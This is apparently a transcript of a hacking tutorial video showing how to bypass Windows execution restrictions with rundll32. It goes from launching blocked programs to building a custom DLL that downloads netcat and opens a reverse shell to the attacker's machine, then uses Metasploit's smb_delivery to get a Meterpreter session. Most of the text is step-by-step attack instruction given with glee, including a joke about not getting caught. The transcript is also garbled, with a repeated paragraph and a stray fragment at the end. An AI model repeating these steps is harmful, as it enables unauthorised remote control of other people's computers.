course, the first thing you do is go to Loy Liang Yang YouTube channel and see if there is such a video that's available that teaches you how to bypass this. And of course, you're in here today because I'll be teaching you how to do just that.
So before we get started, remember kids, hacking is illegal. If you get caught hacking, do not tell them you know it's Mr. Hacker Loy. And of course, the best hackers don't get caught. Now going back to the computer, all we gotta do now is go back over into run. And what I can do now is to use run DLL32 to help us, say, launch some examples of, say, Notepad. So for example, if I enter run DLL32, or you can see lots of examples here already. And what I can do now is .exe shell 32. In this case, I can target, say, notepad.exe. So in this case, this would possibly allow us to run Notepad. So once I clicked on it, I go ahead and click OK. All right, so we have run DL32 exe shell 32, shell execute run dynamic link library notepad.exe. Click OK. Boom. Notepad is out. Second example right here, run DL32 exe shell 32, and in this case we're doing. Alright, we're targeting cmd.exe. Click OK, and boom. Of course, we got blocked for this program. No worries. Likewise, we can target PowerShell as well. Go ahead and click OK, and right here, PowerShell is available for us. The other super interesting example here is building our own dynamic link library that can do more specific things. So in this case, I have a super simple example here that shows us how to do just that. So you can see right here, we have loyliangyang.com, and we open up Firefox, and after which we throw in the parameter which points to loyliangyang.com. So once this DLL is
of course, the first thing you do is go to Loy Liang Yang YouTube channel and see if there is such a video that's available that teaches you how to bypass this. And of course, you're in here today because I'll be teaching you how to do just that.
And now the file is available, so we just have to place it directly into var www, then after which serve it, make it available for the target user to load this DLL. So all I gotta do now is enter sudo systemctl start apache2.service, and all I gotta do right now is enter the password, and then after which all I gotta do is go ahead and copy, say hacker loy2.dll to var www html/hacker loy2.dll, hit enter on that. Alright, let's do a super user do. Boom, done. Going back to the Windows computer, I have Firefox turned on right now. And all I gotta do now is download the hackerloy2.dll. So go ahead and hit enter on that. And let's go ahead and save the file over into, say, desktop. Save. I'll go ahead and replace it. Done. And all I gotta do right now is go back over to run. And all we have to do now is point over to the newly downloaded DLL file. So you can see right here, we have run dll32.exe with C users Loy Liang Yang desktop, hackerloy2.dll, followed by run Firefox. So once you're ready, go ahead and click OK, and boom, you can see right here now, we're going over to loyliangyang.com. And now to seriously take this to the next level, here we are downloading a file called netcat, which will then give us reverse shell. And then of course, we have the target file path, and what we do here is we have the parameter of the PowerShell.exe. So what we do then is we execute onto this file with the ability to reversely connect over into the hacker's machine. Of course, in this case, you're 192.168.0.106, followed by port 1234, and the execution of PowerShell.exe. So this gives us remote control into the target computer. Yes, I know, this is absolutely beautiful. And once you're ready, go ahead and compile it. And once you're done with that, so all we gotta do now is to copy the file over. So all I gotta do now is copy hackerloy.dll over into var www html, and let's call it hackerloy.dll2. Alright, so once you're done with that, all we gotta do now is shift over into the target computer. And in this case, what I can do here is go ahead and download this file. Alright, so in this case, I can go to, say, Firefox and whatnot, and go ahead and enter 192.168.0.106. Okay, and followed by /hackerloy.dll, hit enter on that, save it into desktop, done. Okay, and all we have to do right now is go over into run. So what we want to do is to target this file right now. So we got hackerloy.dll, right, and from the start we're running the run dll32.exe, and all the way towards the end, what we want to do now is go ahead and highlight the function that we've created inside the DLL. And of course, in this case, it'll be download file. Hang on a second, we have not yet started our listener. So all I gotta do right now is enter nc and lvp followed by the port number 1234. Hit enter on that. Just give me a second. All right. Boom. So we're waiting. All I have to do now is head back over into Windows computer, go over into run, and all we gotta do right now, as you can see right here, run dll32.exe, followed by the absolute path of hackerlog.dll, followed by download file, which is the function, and in 3, 2, 1, click OK. I head back over right now to Kali Linux, and you can see right here, we are in. It's game over. I know all of this is super complicated, and you may want something that's a lot easier. So all you gotta do now is go ahead and enter sudo msf console. So we're using Metasploit to help us create the DLL file, and all you have to do as the user is to execute on it using run dll32.exe. That's it, done. So what we can do now is go ahead and use exploit windows smb, or followed by smb_delivery. And once we have that, all we now have to do is say set the SRV host to 192.168.0.106. So this is the Kali Linux IP address that you have. And once you're ready, all you got to do right now is go ahead and enter exploit, and boom, done. So you can see right here, we even have the instruction that's available for you that you can just go ahead and run it on. All right, so this is the run dll32.exe 192.168.0.106. Followed by all of that information, just run it in the target machine. Alright, so I'm back to the target machine. I've written the instruction right here, and in 3, 2, 1, click OK. We see something loading, and if I go back over to Kali Linux, let's see what we get right here. Meterpreter session open. Oh, this is beautiful. So let's say enter sessions. We have one session running right now, so let's go ahead and interact with that. And I can go ahead and enter shell, and then this gives us access directly into the computer. So this gives us a lot of power to do exactly what we want to do. So you can see right here with Windows System 32, we are in. It's game over. Us to run Notepad. So once I clicked on it, I go ahead and click OK.